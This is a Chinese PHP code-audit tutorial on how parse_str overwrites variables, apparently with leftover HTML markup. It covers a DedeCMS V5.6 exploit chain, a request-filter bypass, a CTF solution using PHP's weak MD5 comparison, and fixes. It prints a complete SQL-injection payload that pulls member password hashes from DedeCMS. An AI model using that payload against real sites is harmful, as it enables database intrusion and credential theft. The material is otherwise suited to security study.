PHP代码审计：parse_str函数缺陷与变量覆盖漏洞<\/h1>

1. parse_str函数基础<\/h2>

1.1 函数定义<\/h3>
parse_str<\/code>函数用于解析字符串并注册为变量：<\/p>
void<\/span> parse_str<\/span>(string<\/span> $encoded_string [, array<\/span> &<\/span>$result])
<\/span><\/span><\/code><\/pre>1.2 功能特性<\/h3>

将URL查询字符串解析为变量并设置到当前作用域<\/li>
如果提供第二个数组参数，则结果会存入该数组而非当前作用域<\/li>
关键缺陷<\/strong>：在注册变量前不会验证当前变量是否存在，会直接覆盖当前作用域中的原有变量<\/li>
<\/ul>
2. 漏洞原理分析<\/h2>
2.1 典型漏洞场景<\/h3>
$a =<\/span> "hongri"<\/span>;
<\/span><\/span>$id =<\/span> $_GET['id'<\/span>];
<\/span><\/span>@<\/span>parse_str<\/span>($id); \/\/ 危险：可能覆盖$a变量
<\/span><\/span><\/span><\/code><\/pre>2.2 漏洞利用方式<\/h3>
通过构造特殊参数覆盖已有变量：<\/p>
?id=a[0]=240610708
<\/code><\/pre>
这将导致$a[0]<\/code>被覆盖为攻击者指定的值<\/p>
3. 实际案例分析：DedeCMS V5.6漏洞<\/h2>
3.1 漏洞位置<\/h3>
member\/buy_action.php<\/code>文件中存在以下关键代码：<\/p>
$pd_encode =<\/span> $_REQUEST['pd_encode'<\/span>];
<\/span><\/span>parse_str<\/span>(mchStrCode<\/span>($pd_encode, 'DECODE'<\/span>), $mch_Post);
<\/span><\/span>foreach<\/span>($mch_Post as<\/span> $k =><\/span> $v) {
<\/span><\/span>    
<\/span><\/span>$$<\/span>
<\/span><\/span>k<\/span> =<\/span> $v; \/\/ 变量覆盖漏洞
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 漏洞利用链<\/h3>

攻击者控制pd_encode<\/code>参数<\/li>
参数经过mchStrCode<\/code>解码<\/li>
parse_str<\/code>解析后产生变量覆盖<\/li>
通过foreach<\/code>循环将数组键名注册为变量<\/li>
<\/ol>
3.3 关键函数分析：mchStrCode<\/h3>
function<\/span> mchStrCode<\/span>($string, $action =<\/span> 'ENCODE'<\/span>) {
<\/span><\/span>    $key =<\/span> substr<\/span>(md5<\/span>($_SERVER["HTTP_USER_AGENT"<\/span>].<\/span>$GLOBALS['cfg_cookie_encode'<\/span>]),8<\/span>,18<\/span>);
<\/span><\/span>    \/\/ ...加密\/解密逻辑...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
加密密钥由User-Agent<\/code>和cfg_cookie_encode<\/code>组合生成<\/li>
cfg_cookie_encode<\/code>可通过暴力破解获取（26^6*(9999-1000)种可能）<\/li>
<\/ul>
4. 漏洞利用技巧<\/h2>
4.1 绕过过滤机制<\/h3>
原始过滤代码（common.inc.php<\/code>）：<\/p>
foreach<\/span>($_REQUEST as<\/span> $_k =><\/span> $_v) {
<\/span><\/span>    if<\/span>(strlen<\/span>($_k) ><\/span> 0<\/span> &&<\/span> preg_match<\/span>('\/^(GLOBALS|_GET|_POST|_COOKIE|_SERVER)\/i'<\/span>,$_k)) {
<\/span><\/span>        exit<\/span>('Request var not allow!'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过方法<\/strong>：

利用$_REQUEST<\/code>与parse_str<\/code>解析差异：<\/p>

提交：a=1&b=2%26c=3<\/code><\/li>
$_REQUEST<\/code>解析为：[a=1, b=2%26c=3]<\/code><\/li>
parse_str<\/code>解析为：[a=1, b=2, c=3]<\/code><\/li>
<\/ul>
4.2 完整利用步骤<\/h3>

构造SQL注入payload：<\/li>
<\/ol>
product=card&pid=1&a=1%26cfg_dbprefix=dede_member_operation WHERE 1=@'\/!12345union\/ select 1,2,3,4,5,6,7,8,9,10 FROM (SELECT COUNT(),CONCAT( (SELECT pwd FROM dede_member LIMIT 0,1),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a %23
<\/code><\/pre>


获取系统生成的pd_encode<\/code>和pd_verify<\/code>值<\/p>
<\/li>

构造最终攻击URL：<\/p>
<\/li>
<\/ol>
http:\/\/target.com\/member\/buy_action.php?pd_encode=...&pd_verify=...
<\/code><\/pre>
5. 修复方案<\/h2>
5.1 安全使用parse_str<\/h3>
\/\/ 安全用法：使用数组参数
<\/span><\/span><\/span><\/span>parse_str<\/span>($input, $output);
<\/span><\/span>\/\/ 然后手动处理$output数组中的值
<\/span><\/span><\/span><\/code><\/pre>5.2 变量覆盖防护<\/h3>
\/\/ 使用extract时的安全配置
<\/span><\/span><\/span><\/span>extract<\/span>($input_array, EXTR_SKIP<\/span>); \/\/ 遇到冲突跳过
<\/span><\/span><\/span><\/code><\/pre>5.3 补丁对比<\/h3>
DedeCMS V5.7.36补丁主要改进：<\/p>

加强mchStrCode<\/code>加密强度<\/li>
修改cfg_cookie_encode<\/code>生成方式<\/li>
增加输入验证<\/li>
<\/ol>
6. CTF题目分析<\/h2>
6.1 题目代码<\/h3>
$a =<\/span> "hongri"<\/span>;
<\/span><\/span>$id =<\/span> $_GET['id'<\/span>];
<\/span><\/span>@<\/span>parse_str<\/span>($id);
<\/span><\/span>if<\/span> ($a[0<\/span>] !=<\/span> 'QNKCDZO'<\/span> &&<\/span> md5<\/span>($a[0<\/span>]) ==<\/span> md5<\/span>('QNKCDZO'<\/span>)) {
<\/span><\/span>    echo<\/span> '<a href="uploadsomething.php">flag is here<\/a>'<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>6.2 解题思路<\/h3>

利用parse_str覆盖$a[0]<\/code><\/li>
利用PHP弱类型比较漏洞（MD5碰撞）<\/li>
已知QNKCDZO<\/code>的MD5是0e830400451993494058024219903391<\/code><\/li>
<\/ol>
6.3 解决方案<\/h3>
构造payload：<\/p>
?id=a[0]=240610708
<\/code><\/pre>
因为：<\/p>

md5('240610708') = "0e462097431906509019562988736854"<\/code><\/li>
PHP会将其与0e830400451993494058024219903391<\/code>进行弱类型比较（都视为0）<\/li>
<\/ul>
7. 总结<\/h2>


parse_str<\/strong>函数使用不当会导致变量覆盖漏洞<\/p>
<\/li>

结合其他漏洞（如加密函数缺陷）可形成完整攻击链<\/p>
<\/li>

防御措施：<\/p>

避免直接使用parse_str注册变量<\/li>
使用数组参数形式<\/li>
对用户输入进行严格过滤<\/li>
使用extract时设置EXTR_SKIP参数<\/li>
<\/ul>
<\/li>

审计时重点关注：<\/p>

parse_str\/extract的使用<\/li>
变量覆盖可能性<\/li>
加密\/解密函数的安全性<\/li>
<\/ul>
<\/li>
<\/ol>